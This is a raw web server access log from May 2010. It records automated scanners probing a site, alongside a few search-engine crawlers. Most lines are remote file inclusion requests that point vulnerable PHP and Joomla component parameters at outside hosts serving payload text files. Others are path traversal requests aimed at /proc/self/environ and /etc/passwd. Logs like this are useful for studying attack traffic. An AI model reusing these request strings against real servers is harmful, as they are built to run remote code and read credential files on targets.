207.7.108.203 - - [29/May/2010:19:02:55 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [29/May/2010:19:02:55 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [29/May/2010:19:02:55 -0500] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
38.101.148.126 - - [29/May/2010:19:06:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:19:06:19 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
205.234.101.201 - - [29/May/2010:19:07:03 -0500] "GET /logs/access_log.1273017600//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
205.234.101.201 - - [29/May/2010:19:07:03 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
205.234.101.201 - - [29/May/2010:19:07:03 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
205.234.101.201 - - [29/May/2010:19:07:25 -0500] "GET /logs/access_log.1273017600//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
205.234.101.201 - - [29/May/2010:19:07:25 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
205.234.101.201 - - [29/May/2010:19:07:25 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
207.7.108.203 - - [29/May/2010:19:07:49 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [29/May/2010:19:07:49 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [29/May/2010:19:07:49 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.195.227 - - [29/May/2010:19:12:57 -0500] "GET /logs/access_log.1187308800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.135.61.13 - - [29/May/2010:19:13:52 -0500] "GET /logs/access_log.1270944000/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [29/May/2010:19:13:54 -0500] "GET /logs/access_log.1262822400/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [29/May/2010:19:14:15 -0500] "GET /logs/access_log.1270944000/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [29/May/2010:19:14:16 -0500] "GET /logs/access_log.1262822400/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [29/May/2010:19:19:27 -0500] "GET /artwork/music.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
208.100.59.16 - - [29/May/2010:19:20:16 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:20:16 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:20:16 -0500] "GET /logs/access_log.1272067200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:20:16 -0500] "GET /logs/access_log.1272240000//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.121.217.37 - - [29/May/2010:19:20:34 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
174.121.217.37 - - [29/May/2010:19:20:34 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.80.164.185 - - [29/May/2010:19:24:00 -0500] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:24:00 -0500] "GET /logs/access_log.1270944000//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:24:00 -0500] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:24:02 -0500] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:24:02 -0500] "GET /logs/access_log.1270944000//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:24:02 -0500] "GET /logs/access_log.1272672000//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:24:05 -0500] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:24:16 -0500] "GET /logs/access_log.1272672000//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
121.88.4.141 - - [29/May/2010:19:34:01 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.88.4.141 - - [29/May/2010:19:34:01 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.88.4.141 - - [29/May/2010:19:34:01 -0500] "GET /logs/access_log.1274227200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:38:47 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:38:47 -0500] "GET /logs/access_log.1271635200//index.php?option=com_foobla_suggestions&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:38:47 -0500] "GET //index.php?option=com_foobla_suggestions&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:38:47 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:38:47 -0500] "GET /logs/access_log.1271635200//index.php?option=com_foobla_suggestions&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.100.59.16 - - [29/May/2010:19:38:47 -0500] "GET //index.php?option=com_foobla_suggestions&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [29/May/2010:19:41:59 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 364 "-""Mozilla/5.0"
88.191.94.188 - - [29/May/2010:19:41:59 -0500] "GET /logs/access_log.1271548800//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 386 "-""Mozilla/5.0"
88.191.94.188 - - [29/May/2010:19:41:59 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 359 "-""Mozilla/5.0"
88.191.94.188 - - [29/May/2010:19:42:21 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 359 "-""Mozilla/5.0"
88.191.94.188 - - [29/May/2010:19:42:21 -0500] "GET /logs/access_log.1271548800//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 386 "-""Mozilla/5.0"
88.191.94.188 - - [29/May/2010:19:42:21 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 364 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:20 -0500] "GET /logs/access_log.1271808000//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:20 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:25 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:25 -0500] "GET /logs/access_log.1271808000//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:28 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:33 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:34 -0500] "GET /logs/access_log.1271635200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:53 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:53 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:44:53 -0500] "GET /logs/access_log.1271808000//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:44:54 -0500] "GET /logs//index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:44:54 -0500] "GET /logs/access_log.1271030400//index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:44:54 -0500] "GET //index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:44:56 -0500] "GET /logs/access_log.1272153600//index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:45:23 -0500] "GET //index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:45:23 -0500] "GET /logs//index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:45:23 -0500] "GET /logs/access_log.1271030400//index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [29/May/2010:19:45:25 -0500] "GET /logs/access_log.1272153600//index.php?option=com_custompages&cpage=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:19:46:02 -0500] "GET /logs/access_log.1271635200//index.php?option=com_foobla_suggestions&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:19:46:02 -0500] "GET //index.php?option=com_foobla_suggestions&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:19:46:02 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:19:46:20 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:19:46:20 -0500] "GET //index.php?option=com_foobla_suggestions&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:19:46:20 -0500] "GET /logs/access_log.1271635200//index.php?option=com_foobla_suggestions&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.83.34 - - [29/May/2010:19:46:29 -0500] "GET /inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.175.83.34 - - [29/May/2010:19:46:29 -0500] "GET /logs/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.175.83.34 - - [29/May/2010:19:46:29 -0500] "GET /logs/access_log.1270944000/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.83.34 - - [29/May/2010:19:46:29 -0500] "GET /logs/access_log.1271289600/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.15.152.183 - - [29/May/2010:19:46:57 -0500] "GET /logs//?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 200 7548 "-""Mozilla/5.0"
67.15.152.183 - - [29/May/2010:19:46:57 -0500] "GET /logs/access_log.1271376000//?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.15.152.183 - - [29/May/2010:19:46:57 -0500] "GET //?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:47:06 -0500] "GET /logs/access_log.1271635200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.15.152.183 - - [29/May/2010:19:47:09 -0500] "GET //?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.15.152.183 - - [29/May/2010:19:47:09 -0500] "GET /logs//?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 200 7548 "-""Mozilla/5.0"
67.15.152.183 - - [29/May/2010:19:47:10 -0500] "GET /logs/access_log.1271376000//?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.15.152.183 - - [29/May/2010:19:47:31 -0500] "GET /logs/access_log.1271289600//?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
38.101.148.126 - - [29/May/2010:19:47:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:19:47:37 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
67.15.152.183 - - [29/May/2010:19:47:44 -0500] "GET /logs/access_log.1271289600//?path=http://www.kortech.cn//bbs/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.37.150.18 - - [29/May/2010:19:48:13 -0500] "GET /poll/admin/common.inc.php?base_path=http://talentation.com.au/language/pdf_fonts/fz1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.37.150.18 - - [29/May/2010:19:48:13 -0500] "GET /logs/access_log.1271289600/poll/admin/common.inc.php?base_path=http://talentation.com.au/language/pdf_fonts/fz1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.37.150.18 - - [29/May/2010:19:48:13 -0500] "GET /logs/poll/admin/common.inc.php?base_path=http://talentation.com.au/language/pdf_fonts/fz1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.37.150.18 - - [29/May/2010:19:48:13 -0500] "GET /logs/access_log.1270944000/poll/admin/common.inc.php?base_path=http://talentation.com.au/language/pdf_fonts/fz1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:49:15 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:49:15 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:49:15 -0500] "GET /logs/access_log.1271808000//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
81.208.34.38 - - [29/May/2010:19:49:40 -0500] "GET /logs/access_log.1271635200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://ssghost.com/ssg/PartialMaps/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:00 -0500] "GET /inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:00 -0500] "GET /inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:28 -0500] "GET /logs/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:28 -0500] "GET /logs/access_log.1270944000/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:28 -0500] "GET /logs/access_log.1271289600/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:28 -0500] "GET /logs/access_log.1270944000/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:28 -0500] "GET /logs/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.73.34.214 - - [29/May/2010:19:50:29 -0500] "GET /logs/access_log.1271289600/inc/shows.inc.php?cutepath=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.126.254.3 - - [29/May/2010:19:52:04 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
209.126.254.3 - - [29/May/2010:19:52:04 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
74.14.231.236 - - [29/May/2010:19:52:25 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
74.14.231.236 - - [29/May/2010:19:52:25 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
74.50.85.15 - - [29/May/2010:19:56:15 -0500] "GET //hpmaker/index.php?p=http://www.koreamatchcup.com/bbs///data/file/notice/head.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [29/May/2010:19:56:15 -0500] "GET /logs//hpmaker/index.php?p=http://www.koreamatchcup.com/bbs///data/file/notice/head.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.50.85.15 - - [29/May/2010:19:56:15 -0500] "GET /logs/access_log.1271376000//hpmaker/index.php?p=http://www.koreamatchcup.com/bbs///data/file/notice/head.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:58:09 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:58:09 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:58:12 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:58:37 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:58:37 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:19:58:37 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
122.112.32.51 - - [29/May/2010:20:00:15 -0500] "GET /logs/access_log.1270857600//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 370 "-""Mozilla/5.0"
122.112.32.51 - - [29/May/2010:20:00:15 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
122.112.32.51 - - [29/May/2010:20:00:15 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
38.101.148.126 - - [29/May/2010:20:01:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:20:02:03 -0500] "GET /logs/access_log.1210377600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [29/May/2010:20:04:31 -0500] "GET /tattoo/ HTTP/1.1" 200 - "-""Yandex/1.01.001 (compatible; Win16; I)"
38.101.148.126 - - [29/May/2010:20:05:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:20:05:41 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:20:08:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:20:08:27 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
211.174.62.150 - - [29/May/2010:20:18:40 -0500] "GET /logs/access_log.1271548800////?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:18:40 -0500] "GET ////?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:18:40 -0500] "GET /logs////?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 7550 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:21:31 -0500] "GET //?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
